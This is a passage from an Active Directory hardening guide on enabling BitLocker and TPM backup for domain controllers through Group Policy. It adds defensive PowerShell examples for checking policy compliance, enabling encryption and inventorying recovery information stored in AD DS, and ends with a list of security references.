Then modify the Default Domain Controllers Policy GPO to configure BitLocker properly. Go to Computer Configuration | Administrative Templates | Windows Components | BitLocker Drive Encryption | Provide the unique identifiers for your organization. Enable this setting and select the following settings:

• BitLocker identification field: 14127487
• Allowed BitLocker identification field: 14127487

This setting allows the use of a Data Recovery Agent for BitLocker-encrypted drives (not implemented in this procedure). I usually invite you to use the SIRET number of the company as the organization identifier.

Go to Computer Configuration | Policies | Administrative Templates | Windows Components | BitLocker Drive Encryption | Operating System Drives | Require additional authentication at startup.
Enable the GPO setting with the following configuration: check the box Allow BitLocker without a compatible TPM.
Select the following choices:
• Allow TPM
• Do not allow startup PIN with TPM
• Do not allow startup key with TPM
• Do not allow startup key and PIN with TPM



To secure the system disk of physical domain controllers, use BitLocker with the encryption keys stored in the TPM (Trusted Platform Module). Using a TPM will also enable Secure Boot (protection of the boot files). No password is required at startup.

To secure the system disk of virtual domain controllers, use BitLocker with a startup password. Current virtualization solutions do not natively emulate a TPM, and emulating a USB key on a virtual machine is complex. The administration teams will therefore need access to the console of the virtualization solution (Hyper-V, VMware, ...) to restart the domain controllers, because they will have to enter the BitLocker password at startup.

Go to Computer Configuration | Policies | Administrative Templates | Windows Components | BitLocker Drive Encryption | Operating System Drives | Choose how BitLocker-protected operating system drives can be recovered.

Enable the GPO setting with the following configuration:
• Uncheck the box Allow data recovery agent
• Check the box Omit recovery options from the BitLocker setup wizard
• Check the box Save BitLocker recovery information to AD DS for operating system drives
• Select Store recovery passwords and key packages
• Check the box Do not enable BitLocker until recovery information is stored to AD DS for operating system drives

These settings force the backup of the BitLocker recovery key in Active Directory.

Go to Computer Configuration | Policies | Administrative Templates | System | Trusted Platform Module Services | Turn on TPM backup to Active Directory Domain Services. Enable this GPO setting with the configuration below.

This setting forces the backup of the TPM owner password in Active Directory. Note that the storage method for TPM owner passwords changed with Windows Server 2012 R1 and Windows 8. The schema should be prepared for Windows 2012 R1.

Force replication (NTDS / DFS-R) to all domain controllers and then run the gpupdate /force command on your domain controllers.
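Once gpupdate has run, the applied policy can be verified on the domain controller itself rather than trusted blindly. The function below is an added example (not part of the Msreport guide) that reads the BitLocker and TPM policy registry values corresponding to the four GPO settings configured above and reports each one as compliant or not. The value names are those used by the BitLocker (VolumeEncryption.admx) and TPM (TPM.admx) administrative templates and should be checked against the ADMX version in your central store; the identification field value is the sample value used in this procedure.

```powershell
# Added example (not part of the Msreport guide): verify on a domain controller that the
# BitLocker and TPM GPO settings described above are in effect by reading the policy keys.
# Assumption: value names follow VolumeEncryption.admx and TPM.admx; verify against your
# ADMX version. 14127487 is the sample identification field used in this procedure.

function Test-DcBitLockerPolicy {
    $fve = 'HKLM:\SOFTWARE\Policies\Microsoft\FVE'
    $tpm = 'HKLM:\SOFTWARE\Policies\Microsoft\TPM'

    $expected = @(
        # Provide the unique identifiers for your organization
        @{ Key = $fve; Name = 'IdentificationField';            Value = 1 }
        @{ Key = $fve; Name = 'IdentificationFieldString';      Value = '14127487' }
        @{ Key = $fve; Name = 'SecondaryIdentificationField';   Value = '14127487' }
        # Require additional authentication at startup
        @{ Key = $fve; Name = 'UseAdvancedStartup';             Value = 1 }   # setting enabled
        @{ Key = $fve; Name = 'EnableBDEWithNoTPM';             Value = 1 }   # allow BitLocker without TPM
        @{ Key = $fve; Name = 'UseTPM';                         Value = 2 }   # 2 = allow TPM
        @{ Key = $fve; Name = 'UseTPMPIN';                      Value = 0 }   # 0 = do not allow
        @{ Key = $fve; Name = 'UseTPMKey';                      Value = 0 }
        @{ Key = $fve; Name = 'UseTPMKeyPIN';                   Value = 0 }
        # Choose how BitLocker-protected operating system drives can be recovered
        @{ Key = $fve; Name = 'OSRecovery';                     Value = 1 }   # setting enabled
        @{ Key = $fve; Name = 'OSManageDRA';                    Value = 0 }   # no data recovery agent
        @{ Key = $fve; Name = 'OSHideRecoveryPage';             Value = 1 }   # omit recovery options
        @{ Key = $fve; Name = 'OSActiveDirectoryBackup';        Value = 1 }   # save to AD DS
        @{ Key = $fve; Name = 'OSActiveDirectoryInfoToStore';   Value = 1 }   # passwords and key packages
        @{ Key = $fve; Name = 'OSRequireActiveDirectoryBackup'; Value = 1 }   # no BitLocker until stored
        # Turn on TPM backup to Active Directory Domain Services
        @{ Key = $tpm; Name = 'ActiveDirectoryBackup';          Value = 1 }
    )

    foreach ($e in $expected) {
        $actual = $null
        if (Test-Path -Path $e.Key) {
            $actual = (Get-ItemProperty -Path $e.Key -Name $e.Name -ErrorAction SilentlyContinue).($e.Name)
        }
        [pscustomobject]@{
            Setting   = $e.Name
            Expected  = $e.Value
            Actual    = $actual
            Compliant = ($null -ne $actual) -and ("$actual" -eq "$($e.Value)")
        }
    }
}

# Any row with Compliant = False means the GPO did not apply (replication, filtering, or a
# conflicting GPO with higher precedence)
Test-DcBitLockerPolicy | Format-Table -AutoSize
```

A missing value (Actual empty) most often means the GPO has not replicated to the domain controller yet or a GPO with higher precedence overrides it; gpresult /h can then show which GPO won.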

Add the rights in the directory needed to update the TPM owner password. As explained in the TechNet article http://technet.microsoft.com/fr-fr/library/dd875529(v=ws.10), the Add-TPMSelfWriteACE.vbs script must be used to allow the TPM owner password to be written to the msTPM-OwnerInformation attribute.

By default, only members of the Domain Admins group have the right to view:
• The BitLocker recovery key
• The Trusted Platform Module (TPM) owner password

The Get-TPMOwnerInfo.vbs script can be used to view the Trusted Platform Module (TPM) owner password, and the Get-BitLockerRecoveryInfo.vbs script to view the BitLocker recovery key.

You can now turn on BitLocker on your physical or virtual domain controller from the Control Panel. In our case, the domain controller runs Windows 2012 R2. The Active Directory database (Ntds.dit) and the SYSVOL directory are hosted on the system disk.
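The same activation can be scripted with the BitLocker PowerShell module shipped with Windows 2012 R2. The function below is an added example and not part of the Msreport guide: it picks the TPM protector on a physical domain controller and a startup password on a virtual one, as recommended above, and backs the recovery password up to AD DS before encryption starts, which is what the "Do not enable BitLocker until recovery information is stored to AD DS" setting requires. It assumes the GPO settings of this section are applied (in particular "Allow BitLocker without a compatible TPM" for the password protector on an operating system drive) and that Get-Tpm from the TrustedPlatformModule module is available.

```powershell
# Added example (not part of the Msreport guide): enable BitLocker on the system drive of a
# domain controller with the BitLocker PowerShell module (Windows 2012 R2).
# Assumptions: the GPO settings above are applied; Get-Tpm (TrustedPlatformModule module)
# reports whether a usable TPM exists; Aes256 is chosen as the encryption method.

function Enable-DcBitLocker {
    param(
        [string]$MountPoint = 'C:',
        [System.Security.SecureString]$StartupPassword   # used only when no usable TPM is found
    )
    $vol = Get-BitLockerVolume -MountPoint $MountPoint
    if ($vol.VolumeStatus -ne 'FullyDecrypted') {
        Write-Warning "$MountPoint is already protected or being encrypted: $($vol.VolumeStatus)"
        return $vol
    }

    # 1. Recovery password first, backed up to the computer object in AD DS: the GPO above
    #    refuses to start encryption until this backup has succeeded
    Add-BitLockerKeyProtector -MountPoint $MountPoint -RecoveryPasswordProtector | Out-Null
    $recovery = (Get-BitLockerVolume -MountPoint $MountPoint).KeyProtector |
        Where-Object KeyProtectorType -eq 'RecoveryPassword'
    foreach ($rp in $recovery) {
        Backup-BitLockerKeyProtector -MountPoint $MountPoint -KeyProtectorId $rp.KeyProtectorId
    }

    # 2. Boot-time protector: TPM on a physical DC, startup password on a virtual DC
    $tpm = Get-Tpm -ErrorAction SilentlyContinue
    if ($tpm -and $tpm.TpmPresent -and $tpm.TpmReady) {
        # Key sealed in the TPM, boot chain validated, no password at startup
        Enable-BitLocker -MountPoint $MountPoint -TpmProtector -EncryptionMethod Aes256 -SkipHardwareTest
    } else {
        if (-not $StartupPassword) {
            $StartupPassword = Read-Host -Prompt 'Startup password for the virtual DC' -AsSecureString
        }
        # Hypervisors do not emulate a TPM, so the password is entered from the VM console
        Enable-BitLocker -MountPoint $MountPoint -PasswordProtector -Password $StartupPassword `
            -EncryptionMethod Aes256 -SkipHardwareTest
    }
    return Get-BitLockerVolume -MountPoint $MountPoint
}

Enable-DcBitLocker |
    Select-Object MountPoint, VolumeStatus, ProtectionStatus, EncryptionPercentage, KeyProtector
```

The order matters: adding and backing up the recovery password before calling Enable-BitLocker is what keeps the procedure compatible with the "require AD DS backup" policy, and it also means a domain controller is never encrypted with a recovery password that exists only on that same machine.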

If you have forgotten the BitLocker password, you can use the recovery key that is stored in the computer account. To do this, press ESC.

From another domain controller, start the Active Directory Users and Computers console. Switch the console to Advanced Features mode and enable Users, Contacts, and Computers as containers. Go to the properties of the domain controller computer account.

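Checking every domain controller's computer account one by one in the console does not scale, and the recovery secrets themselves should not be displayed during a routine check. The function below is an added example (not part of the Msreport guide): with the ActiveDirectory module it reports, for each domain controller, how many BitLocker recovery passwords (msFVE-RecoveryInformation child objects) are stored under its computer account and whether TPM owner information is present (msTPM-OwnerInformation, or the msTPM-TpmInformationForComputer link used with the Windows 2012 R1 and later schema), without reading the passwords. It needs the read rights that, as stated above, only Domain Admins hold by default.

```powershell
# Added example (not part of the Msreport guide): read-only inventory of BitLocker recovery
# information and TPM owner information stored in AD DS for each domain controller.
# Assumptions: the ActiveDirectory module is installed; the account running it has the
# Domain Admins read rights on the BitLocker and TPM attributes mentioned above.

function Get-DcRecoveryInfoStatus {
    Import-Module ActiveDirectory
    foreach ($dc in Get-ADDomainController -Filter *) {
        $computer = Get-ADComputer -Identity $dc.ComputerObjectDN `
            -Properties msTPM-OwnerInformation, msTPM-TpmInformationForComputer

        # Recovery passwords are stored as msFVE-RecoveryInformation objects directly under
        # the computer account; only their existence and age are reported, never their value
        $recovery = @(Get-ADObject -SearchBase $computer.DistinguishedName -SearchScope OneLevel `
            -Filter { objectClass -eq 'msFVE-RecoveryInformation' } `
            -Properties msFVE-RecoveryGuid, whenCreated)
        $latest = $recovery | Sort-Object whenCreated -Descending | Select-Object -First 1

        [pscustomobject]@{
            DomainController      = $dc.HostName
            RecoveryPasswordCount = $recovery.Count
            LatestRecoveryBackup  = if ($latest) { $latest.whenCreated } else { $null }
            TpmOwnerInfoLegacy    = [bool]$computer.'msTPM-OwnerInformation'
            TpmInfoObjectLinked   = [bool]$computer.'msTPM-TpmInformationForComputer'
        }
    }
}

# A domain controller with RecoveryPasswordCount = 0 has no usable recovery path in AD DS
Get-DcRecoveryInfoStatus | Format-Table -AutoSize
```

A count of zero on an encrypted domain controller, or a backup date older than the last BitLocker re-key, is the condition to alert on: the recovery procedure above depends entirely on that object existing in the directory.
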
8.3 REFERENCES:

8.3.1 RECOMMENDED BOOK

I invite you to read the book on hacking techniques by Jon Erickson, published by PEARSON.
This book will help you understand the main attacks and write scripts for basic attacks.

8.3.2 MICROSOFT ACTIVE DIRECTORY TECHNICAL SPECIFICATION

Microsoft provides the Active Directory Technical Specification on MSDN. Reading paragraph 5, Security, is essential to understand how to secure Active Directory. To download this guide in PDF format (English):

http://msdn.microsoft.com/en-us/library/cc223122.aspx

8.3.3 TO UNDERSTAND THE NTLM AND KERBEROS PROTOCOLS WITH ACTIVE DIRECTORY

I invite you to read these two documents, which are very complete, very clear and in French. Thanks, among others, to Aurélien BORDES for the clarity of the explanations.
https://www.sstic.org/media/SSTIC2007/SSTIC-actes/Secrets_d_authentification_sous_Windows/SSTIC2007-Article-Secrets_d_authentification_sous_Windows-bordes.pdf
http://www.ssi.gouv.fr/IMG/pdf/Aurelien_Bordes_-_Secrets_d_authentification_episode_II_Kerberos_contre-attaque.pdf

8.3.4 THE ANSSI RECOMMENDATIONS ON ACTIVE DIRECTORY SECURITY

The ANSSI (the French national agency for information systems security) has written a very comprehensive document of security recommendations for Active Directory. Many elements of this guide come from these recommendations:
http://www.ssi.gouv.fr/IMG/pdf/NP_ActiveDirectory_NoteTech.pdf

Other guides are available on the site:


http://www.ssi.gouv.fr/fr/guides-et-bonnes-pratiques/recommandations-et-guides/

8.3.5 MICROSOFT RECOMMENDATIONS ON ACTIVE DIRECTORY SECURITY

Microsoft has written a comprehensive document of security recommendations for Active Directory, which can be downloaded from one of the two links below:
http://www.microsoft.com/en-us/download/details.aspx?id=38785
http://aka.ms/bpsad

8.3.6 RECOMMENDATIONS ON CONFIGURING THE TERMINAL SERVER SERVICE

This document explains the inner workings of the RDP protocol, its evolution and how to configure it securely:

https://www.sstic.org/media/SSTIC2012/SSTIC-actes/securite_rdp/SSTIC2012-Article-securite_rdpebalard_bordes_rigo_2.pdf

8.3.7 OTHER LINKS

I invite you to read these two documents on the Pass-the-Hash (NTLM) attack:
http://www.microsoft.com/en-us/download/details.aspx?id=36036
http://www.sans.org/reading-room/whitepapers/testing/pass-the-hash-attacks-tools-mitigation-33283
